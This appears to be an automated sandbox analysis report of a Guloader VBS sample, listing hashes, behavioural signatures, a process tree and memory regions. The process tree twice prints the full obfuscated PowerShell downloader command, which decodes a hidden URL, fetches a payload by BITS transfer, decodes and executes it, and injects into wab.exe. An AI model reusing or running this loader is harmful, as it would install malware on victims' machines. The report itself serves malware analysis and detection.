Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13/02/2024, 03:03

General

  • Target

    4899cdb23cf206532e2ccfe1eb170256012e2ee7664a89e5472e52f2a6274001.vbs

  • Size

    36KB

  • MD5

    de8bb4e7b3b42adcc01eaf37409ba15a

  • SHA1

    77e869d2cdb86aea090f14a444e0d1ee39e5cd68

  • SHA256

    4899cdb23cf206532e2ccfe1eb170256012e2ee7664a89e5472e52f2a6274001

  • SHA512

    5258eaf86e2da5799b8d4c73c5b7047502d7e66000bef6b6680aafc931c7590eb005917c9af4c8a788ee16638870354c3f044434d381b934f5ada38c09a48569

  • SSDEEP

    768:vUJZmkTEmGkXZwCwzWfMKjWcHISdD0i6z2l+KaRB0e:cJLEXM9wzPKjXHISJ0i6z2w/f

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 46 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:3424
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4899cdb23cf206532e2ccfe1eb170256012e2ee7664a89e5472e52f2a6274001.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4564
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sengetj;function Inacho37 ($Reunitea, $Stasop, $Unre) {$Reunitea.'Substring'( $Stasop, $Unre);}Function Over9 ([String]$Leadoffe){For($Boilers=5; $Boilers -lt $Leadoffe.Length-$Camp; $Boilers+=6){$Concisely=Inacho37 $Leadoffe $Boilers $Camp;$Finans=$Finans+$Concisely}$Finans;}$Sneboldeff = 'tzutil /l';$Skva44 = (cmd /c $Sneboldeff);$Skva44 = [string]$Skva44;$BoilersNDICE = $Skva44.indexOf('1');$Camp = Inacho37 $Skva44 $BoilersNDICE 1;$Nonp=Over9 ' kanihFejletScopotNonacp Arbi:Amphi/Forel/Chowc4Fileh6 Spkl.kongs1Udann8 Udtr3 Hair.Prepr2neate2Udspi2 Indu.Trafi1Bakni9retsm/MandeOHalitpSalumsAssesvSkggeuTikrolForfamFirepeRabbi.ValutdUncons ImpopHypno ';$Finans01=Over9 'PensiiAncreeGeorgx Stud ';$Samsskb = Over9 'Epupi\HandlsSamaryDistesStenmwNonmeoUnattw Bere6 Glos4Bejds\EcuadWAbonniHypernRadiadCacozoPermuwkardisSvajnP PlatoCapmawForpre AflurPhoenSLscflh FrisejaloulBlentlEksam\ ConfvChatt1Yndig.Storl0 Naga\IfsvipHouseo Duftw CasaeSammerPtsmksPatenhdualieStrobl Pyralcremn.NoneveDobbexAssemeradia ';&($Finans01) (Over9 'Overi$MinimSOverlpUtjeklFolinaFlove2Konfi= Rang$Syphie RevinSyllavAftvi:ExcitwNongiiKrambn UnredDiethiMultir Oven ') ;&($Finans01) (Over9 'Dyret$BrnepSTypogaBlokhmJugulsWinchsTumpfkBordebTubif=Under$ AnsvS EnfepLnsitlSurbeaHiero2Ynksm+Playm$ObskuSEkspaaSneplmPrints Fetas WaylkBenthbTrdes ') ;&($Finans01) (Over9 ' Fore$BegreELindekGatatsFoalte UndemGentopKendteAfbinl nicktMinimeSkovr Renab=Talni Kile(Betvi(PippigBitinwChirpm Stati Affa Sakfrwpreeli EchonUnbud3Resse2Atlas_Calypp Cowhr Blaco DreacKonfre TrlasKorrespanda Trans-FabriFCynop IncesPPakkergtebaoSignicSakkae SoeesSkibssCamelIEksisdUdbyt=Salmi$Plund{ KokePAppliIdysmoDfloru} Aand)Desmo.fueloCstilloSkatomRestamTerriaDitzinKortsdFaceoLStkkeiDisapnAdelaeFremm)repeo Borta-BinghsLnindpHanknlStvneiOverstBrogu Tocc[Tronpc NasthPinseaKunstrCorom]Barne3Cyber4Throu ');&($Finans01) (Over9 ' Undi$FolkeS EpippUnyttiSubcodSlabbsProgrfViden slurr=Terat Cusks$podiaEGumbokcincisChefge JaegmShintpSkulpeRdarvlOverst VexieDunie[Julek$ PleaE MedikGendasDipheemarblmUnsabpYeshie Foldl UbebtBabaje Lyci. ExcrcNauruoEmoluukropdnSpaketPrime-Prang2Uviss]Stere ');&($Finans01) (Over9 ' Poli$VelseOKagesmIndisdTrersa MicrnUnivenstifieAnoin=Miens(EmneaTGynece RevisExtrat Adko-ProabPHelbeaSkindtAtonah Indk Stop$HerniSTeskeaSarksm Tryks StjrsArithkHelmhbBudbr)Gulli Hjemm-SnerlA impanBraildBevid Virus(Umtte[TumliIAvancnUnsedt UnasPPyopot Forrr Fore]Vrels:Doles:FoamssSgersiStenuzjerngeLakfj Tribo-OutpoeBrdflqOpsge Sheat8Fuelo)Suben ') ;if ($Omdanne) {.$Samsskb $Spidsf;} else {;$Finans00=Over9 'BanglSPirogtTuensaLbetirNonintKontr-KlemsBRealliSammetOlietsUnfeaTTuladrAldidaForannCoryds richfStraneKashurKryds Fangi-KutenS CapooBrahmu StdprPantec Kirtebarbe Modta$ UndsNNeedloUlykknRansop Expe Dehy-BrsigDrivuleUdbansHighbttruehiJrginnDemora FlagtHasteiPlagso sapinIlsom Engel$AutenSBusfapTrimelfeveraItali2Encho ';&($Finans01) (Over9 'Super$MaddiSubeslp SvenlVerdiaTilgr2Fodbo=Ethox$CotereAgurknSalgsvarche: UnosaVinstpSonorpZoomodstropa KdvatCorpoaHafto ') ;&($Finans01) (Over9 'MisusIKoldtmHydropBorgmoDonumrDiplotWaggo-BrillMOndsioSkuffdFactuuFyldelInsipe Yata PantaBtilegi EvoltSorelsKorneTbommerFrilgaCyclonWcspesTrafifLabileoverirDiest ') ;$Spla2=$Spla2+'\Stat.Kol';while (-not $Retankam) {&($Finans01) (Over9 ' Paal$aedilRCodife CurstunscaaDolkenPyocykAnisbaStokemSkrib=Likvi( ProlTSuggeeAntimsUnunitRaind-StanzP EuchaHovmotRetaihKalkm taans$SociaSAorispUnderlOutlaaJoyle2Bejez)Canke ') ;&($Finans01) $Finans00;&($Finans01) (Over9 'LouanSangultIndicaTilfgrCommetKosmo-IndsnSStrstlCorcleSejrveLnnedppapir Data5Andan ');}&($Finans01) (Over9 'raads$StvniOalithv CauleFidgerGoldi Uddat=Paris FiredGProcoeMadrot Vari- TitlCSociaoTekstn DemitFedesePageunMervrtAtloa Dyrk$SidegSBlystpSlutnl BarcaSulfo2Planl ');&($Finans01) (Over9 'Ricin$StenrOFormsp Bisca TranlRedigiKnscesOzenahBefjeb Snoo Span=Forst laang[TelynSGliocyBaldasSursytTonjoe FucomIntim.FlamlCHemitoHalvmnThailvNonnaeTaarnrPaedat Wrok]otone:Nycta:UntakFMultir Muddooctylm BathBCarpoaRivers GobeeLysim6Forli4OstenSBismet AbutrBaulkiRunklnDatalgTapet(Prest$ ukriOSupervEskadeBdestrEyela)Lensa ');&($Finans01) (Over9 'Locat$BurdaFHusleiMelapnShowwa Shinn MarasUddel2 Seve Polic= Circ Betyd[FloodS BefjyOverssBlaaftOwetieFuldkmFlett.VicedTCentieHnsehxDyssetOpgav.FarefEKnippn AcrocAntidoNonindtelcoi BelunGlutigDeskr]Barth:Bibli: ShivA PersSOutseCYnderIterseIPhleb. OrbiGJingleRvenstQuadrSFattitAtmenrKnighiCarbunRevsegCladd(Tilnr$ BillOUdslapFrdigaOverkl AutoiKetipssuccohRectibIndst)Powde ');&($Finans01) (Over9 ' Flyb$FremsCDenasuPejlepLadyeufjtedlDdsfo=Oryde$AtabeFTitiliSpatinUdspeaFyrafnObskus Skva2Mccal.Forans LobeuBoatlbnitros Rorkt BurirAllitiDemognFrnutgSomat(Marri2Fedts9udvik8Sygev4Convo4Hidti5Indse,Video1outta9Angel4Forpe1Aabni9 Unde) Staa ');&($Finans01) $Cupul;}"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1800
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "tzutil /l"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:400
          • C:\Windows\system32\tzutil.exe
            tzutil /l
            5⤵
              PID:2736
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sengetj;function Inacho37 ($Reunitea, $Stasop, $Unre) {$Reunitea.'Substring'( $Stasop, $Unre);}Function Over9 ([String]$Leadoffe){For($Boilers=5; $Boilers -lt $Leadoffe.Length-$Camp; $Boilers+=6){$Concisely=Inacho37 $Leadoffe $Boilers $Camp;$Finans=$Finans+$Concisely}$Finans;}$Sneboldeff = 'tzutil /l';$Skva44 = (cmd /c $Sneboldeff);$Skva44 = [string]$Skva44;$BoilersNDICE = $Skva44.indexOf('1');$Camp = Inacho37 $Skva44 $BoilersNDICE 1;$Nonp=Over9 ' kanihFejletScopotNonacp Arbi:Amphi/Forel/Chowc4Fileh6 Spkl.kongs1Udann8 Udtr3 Hair.Prepr2neate2Udspi2 Indu.Trafi1Bakni9retsm/MandeOHalitpSalumsAssesvSkggeuTikrolForfamFirepeRabbi.ValutdUncons ImpopHypno ';$Finans01=Over9 'PensiiAncreeGeorgx Stud ';$Samsskb = Over9 'Epupi\HandlsSamaryDistesStenmwNonmeoUnattw Bere6 Glos4Bejds\EcuadWAbonniHypernRadiadCacozoPermuwkardisSvajnP PlatoCapmawForpre AflurPhoenSLscflh FrisejaloulBlentlEksam\ ConfvChatt1Yndig.Storl0 Naga\IfsvipHouseo Duftw CasaeSammerPtsmksPatenhdualieStrobl Pyralcremn.NoneveDobbexAssemeradia ';&($Finans01) (Over9 'Overi$MinimSOverlpUtjeklFolinaFlove2Konfi= Rang$Syphie RevinSyllavAftvi:ExcitwNongiiKrambn UnredDiethiMultir Oven ') ;&($Finans01) (Over9 'Dyret$BrnepSTypogaBlokhmJugulsWinchsTumpfkBordebTubif=Under$ AnsvS EnfepLnsitlSurbeaHiero2Ynksm+Playm$ObskuSEkspaaSneplmPrints Fetas WaylkBenthbTrdes ') ;&($Finans01) (Over9 ' Fore$BegreELindekGatatsFoalte UndemGentopKendteAfbinl nicktMinimeSkovr Renab=Talni Kile(Betvi(PippigBitinwChirpm Stati Affa Sakfrwpreeli EchonUnbud3Resse2Atlas_Calypp Cowhr Blaco DreacKonfre TrlasKorrespanda Trans-FabriFCynop IncesPPakkergtebaoSignicSakkae SoeesSkibssCamelIEksisdUdbyt=Salmi$Plund{ KokePAppliIdysmoDfloru} Aand)Desmo.fueloCstilloSkatomRestamTerriaDitzinKortsdFaceoLStkkeiDisapnAdelaeFremm)repeo Borta-BinghsLnindpHanknlStvneiOverstBrogu Tocc[Tronpc NasthPinseaKunstrCorom]Barne3Cyber4Throu ');&($Finans01) (Over9 ' Undi$FolkeS EpippUnyttiSubcodSlabbsProgrfViden slurr=Terat Cusks$podiaEGumbokcincisChefge JaegmShintpSkulpeRdarvlOverst VexieDunie[Julek$ PleaE MedikGendasDipheemarblmUnsabpYeshie Foldl UbebtBabaje Lyci. ExcrcNauruoEmoluukropdnSpaketPrime-Prang2Uviss]Stere ');&($Finans01) (Over9 ' Poli$VelseOKagesmIndisdTrersa MicrnUnivenstifieAnoin=Miens(EmneaTGynece RevisExtrat Adko-ProabPHelbeaSkindtAtonah Indk Stop$HerniSTeskeaSarksm Tryks StjrsArithkHelmhbBudbr)Gulli Hjemm-SnerlA impanBraildBevid Virus(Umtte[TumliIAvancnUnsedt UnasPPyopot Forrr Fore]Vrels:Doles:FoamssSgersiStenuzjerngeLakfj Tribo-OutpoeBrdflqOpsge Sheat8Fuelo)Suben ') ;if ($Omdanne) {.$Samsskb $Spidsf;} else {;$Finans00=Over9 'BanglSPirogtTuensaLbetirNonintKontr-KlemsBRealliSammetOlietsUnfeaTTuladrAldidaForannCoryds richfStraneKashurKryds Fangi-KutenS CapooBrahmu StdprPantec Kirtebarbe Modta$ UndsNNeedloUlykknRansop Expe Dehy-BrsigDrivuleUdbansHighbttruehiJrginnDemora FlagtHasteiPlagso sapinIlsom Engel$AutenSBusfapTrimelfeveraItali2Encho ';&($Finans01) (Over9 'Super$MaddiSubeslp SvenlVerdiaTilgr2Fodbo=Ethox$CotereAgurknSalgsvarche: UnosaVinstpSonorpZoomodstropa KdvatCorpoaHafto ') ;&($Finans01) (Over9 'MisusIKoldtmHydropBorgmoDonumrDiplotWaggo-BrillMOndsioSkuffdFactuuFyldelInsipe Yata PantaBtilegi EvoltSorelsKorneTbommerFrilgaCyclonWcspesTrafifLabileoverirDiest ') ;$Spla2=$Spla2+'\Stat.Kol';while (-not $Retankam) {&($Finans01) (Over9 ' Paal$aedilRCodife CurstunscaaDolkenPyocykAnisbaStokemSkrib=Likvi( ProlTSuggeeAntimsUnunitRaind-StanzP EuchaHovmotRetaihKalkm taans$SociaSAorispUnderlOutlaaJoyle2Bejez)Canke ') ;&($Finans01) $Finans00;&($Finans01) (Over9 'LouanSangultIndicaTilfgrCommetKosmo-IndsnSStrstlCorcleSejrveLnnedppapir Data5Andan ');}&($Finans01) (Over9 'raads$StvniOalithv CauleFidgerGoldi Uddat=Paris FiredGProcoeMadrot Vari- TitlCSociaoTekstn DemitFedesePageunMervrtAtloa Dyrk$SidegSBlystpSlutnl BarcaSulfo2Planl ');&($Finans01) (Over9 'Ricin$StenrOFormsp Bisca TranlRedigiKnscesOzenahBefjeb Snoo Span=Forst laang[TelynSGliocyBaldasSursytTonjoe FucomIntim.FlamlCHemitoHalvmnThailvNonnaeTaarnrPaedat Wrok]otone:Nycta:UntakFMultir Muddooctylm BathBCarpoaRivers GobeeLysim6Forli4OstenSBismet AbutrBaulkiRunklnDatalgTapet(Prest$ ukriOSupervEskadeBdestrEyela)Lensa ');&($Finans01) (Over9 'Locat$BurdaFHusleiMelapnShowwa Shinn MarasUddel2 Seve Polic= Circ Betyd[FloodS BefjyOverssBlaaftOwetieFuldkmFlett.VicedTCentieHnsehxDyssetOpgav.FarefEKnippn AcrocAntidoNonindtelcoi BelunGlutigDeskr]Barth:Bibli: ShivA PersSOutseCYnderIterseIPhleb. OrbiGJingleRvenstQuadrSFattitAtmenrKnighiCarbunRevsegCladd(Tilnr$ BillOUdslapFrdigaOverkl AutoiKetipssuccohRectibIndst)Powde ');&($Finans01) (Over9 ' Flyb$FremsCDenasuPejlepLadyeufjtedlDdsfo=Oryde$AtabeFTitiliSpatinUdspeaFyrafnObskus Skva2Mccal.Forans LobeuBoatlbnitros Rorkt BurirAllitiDemognFrnutgSomat(Marri2Fedts9udvik8Sygev4Convo4Hidti5Indse,Video1outta9Angel4Forpe1Aabni9 Unde) Staa ');&($Finans01) $Cupul;}"
            4⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4308
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "tzutil /l"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4948
              • C:\Windows\SysWOW64\tzutil.exe
                tzutil /l
                6⤵
                  PID:4632
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                5⤵
                • Suspicious use of NtCreateThreadExHideFromDebugger
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                PID:2400
        • C:\Windows\SysWOW64\SyncHost.exe
          "C:\Windows\SysWOW64\SyncHost.exe"
          2⤵
          • Adds policy Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          PID:2684

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3yeabcku.bay.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/1800-13-0x00000223BECA0000-0x00000223BECB0000-memory.dmp

        Filesize

        64KB

      • memory/1800-10-0x00007FFDB8420000-0x00007FFDB8EE1000-memory.dmp

        Filesize

        10.8MB

      • memory/1800-12-0x00000223BECA0000-0x00000223BECB0000-memory.dmp

        Filesize

        64KB

      • memory/1800-11-0x00000223BECA0000-0x00000223BECB0000-memory.dmp

        Filesize

        64KB

      • memory/1800-62-0x00007FFDB8420000-0x00007FFDB8EE1000-memory.dmp

        Filesize

        10.8MB

      • memory/1800-9-0x00000223A6720000-0x00000223A6742000-memory.dmp

        Filesize

        136KB

      • memory/1800-42-0x00007FFDB8420000-0x00007FFDB8EE1000-memory.dmp

        Filesize

        10.8MB

      • memory/1800-43-0x00000223BECA0000-0x00000223BECB0000-memory.dmp

        Filesize

        64KB

      • memory/2400-75-0x000000001FE00000-0x000000001FE23000-memory.dmp

        Filesize

        140KB

      • memory/2400-59-0x0000000000400000-0x00000000005E4000-memory.dmp

        Filesize

        1.9MB

      • memory/2400-57-0x0000000000400000-0x00000000005E4000-memory.dmp

        Filesize

        1.9MB

      • memory/2400-74-0x0000000000400000-0x00000000005E4000-memory.dmp

        Filesize

        1.9MB

      • memory/2400-56-0x00000000770C8000-0x00000000770C9000-memory.dmp

        Filesize

        4KB

      • memory/2400-54-0x0000000001200000-0x00000000042FE000-memory.dmp

        Filesize

        49.0MB

      • memory/2400-55-0x0000000077041000-0x0000000077161000-memory.dmp

        Filesize

        1.1MB

      • memory/2400-64-0x0000000000400000-0x00000000005E4000-memory.dmp

        Filesize

        1.9MB

      • memory/2400-71-0x0000000000400000-0x00000000005E4000-memory.dmp

        Filesize

        1.9MB

      • memory/2400-63-0x0000000020030000-0x000000002037A000-memory.dmp

        Filesize

        3.3MB

      • memory/2400-69-0x000000001FE00000-0x000000001FE23000-memory.dmp

        Filesize

        140KB

      • memory/2400-68-0x0000000000400000-0x00000000005E4000-memory.dmp

        Filesize

        1.9MB

      • memory/2400-65-0x0000000001200000-0x00000000042FE000-memory.dmp

        Filesize

        49.0MB

      • memory/2684-80-0x0000000000C00000-0x0000000000C3C000-memory.dmp

        Filesize

        240KB

      • memory/2684-72-0x0000000000C00000-0x0000000000C3C000-memory.dmp

        Filesize

        240KB

      • memory/2684-73-0x0000000000C00000-0x0000000000C3C000-memory.dmp

        Filesize

        240KB

      • memory/2684-76-0x0000000002B00000-0x0000000002E4A000-memory.dmp

        Filesize

        3.3MB

      • memory/2684-77-0x0000000000C00000-0x0000000000C3C000-memory.dmp

        Filesize

        240KB

      • memory/2684-78-0x00000000029D0000-0x0000000002A72000-memory.dmp

        Filesize

        648KB

      • memory/2684-81-0x00000000029D0000-0x0000000002A72000-memory.dmp

        Filesize

        648KB

      • memory/3424-70-0x000000000C440000-0x000000000CB96000-memory.dmp

        Filesize

        7.3MB

      • memory/3424-79-0x000000000C440000-0x000000000CB96000-memory.dmp

        Filesize

        7.3MB

      • memory/4308-32-0x00000000068A0000-0x00000000068BE000-memory.dmp

        Filesize

        120KB

      • memory/4308-50-0x0000000008EB0000-0x000000000BFAE000-memory.dmp

        Filesize

        49.0MB

      • memory/4308-51-0x0000000008EB0000-0x000000000BFAE000-memory.dmp

        Filesize

        49.0MB

      • memory/4308-52-0x0000000077041000-0x0000000077161000-memory.dmp

        Filesize

        1.1MB

      • memory/4308-53-0x0000000008EB0000-0x000000000BFAE000-memory.dmp

        Filesize

        49.0MB

      • memory/4308-48-0x0000000005410000-0x0000000005420000-memory.dmp

        Filesize

        64KB

      • memory/4308-49-0x0000000007F30000-0x0000000007F31000-memory.dmp

        Filesize

        4KB

      • memory/4308-47-0x0000000005410000-0x0000000005420000-memory.dmp

        Filesize

        64KB

      • memory/4308-46-0x0000000005410000-0x0000000005420000-memory.dmp

        Filesize

        64KB

      • memory/4308-44-0x0000000074620000-0x0000000074DD0000-memory.dmp

        Filesize

        7.7MB

      • memory/4308-58-0x0000000074620000-0x0000000074DD0000-memory.dmp

        Filesize

        7.7MB

      • memory/4308-41-0x0000000007F40000-0x0000000007F54000-memory.dmp

        Filesize

        80KB

      • memory/4308-40-0x0000000007EA0000-0x0000000007EC2000-memory.dmp

        Filesize

        136KB

      • memory/4308-39-0x0000000008900000-0x0000000008EA4000-memory.dmp

        Filesize

        5.6MB

      • memory/4308-38-0x0000000007AB0000-0x0000000007AD2000-memory.dmp

        Filesize

        136KB

      • memory/4308-37-0x0000000007B10000-0x0000000007BA6000-memory.dmp

        Filesize

        600KB

      • memory/4308-36-0x0000000006E80000-0x0000000006E9A000-memory.dmp

        Filesize

        104KB

      • memory/4308-35-0x0000000008280000-0x00000000088FA000-memory.dmp

        Filesize

        6.5MB

      • memory/4308-34-0x0000000005410000-0x0000000005420000-memory.dmp

        Filesize

        64KB

      • memory/4308-33-0x00000000068E0000-0x000000000692C000-memory.dmp

        Filesize

        304KB

      • memory/4308-31-0x0000000006390000-0x00000000066E4000-memory.dmp

        Filesize

        3.3MB

      • memory/4308-22-0x0000000006220000-0x0000000006286000-memory.dmp

        Filesize

        408KB

      • memory/4308-20-0x00000000061B0000-0x0000000006216000-memory.dmp

        Filesize

        408KB

      • memory/4308-19-0x00000000059D0000-0x00000000059F2000-memory.dmp

        Filesize

        136KB

      • memory/4308-18-0x0000000005A50000-0x0000000006078000-memory.dmp

        Filesize

        6.2MB

      • memory/4308-17-0x0000000005410000-0x0000000005420000-memory.dmp

        Filesize

        64KB

      • memory/4308-16-0x00000000052E0000-0x0000000005316000-memory.dmp

        Filesize

        216KB

      • memory/4308-15-0x0000000005410000-0x0000000005420000-memory.dmp

        Filesize

        64KB

      • memory/4308-14-0x0000000074620000-0x0000000074DD0000-memory.dmp

        Filesize

        7.7MB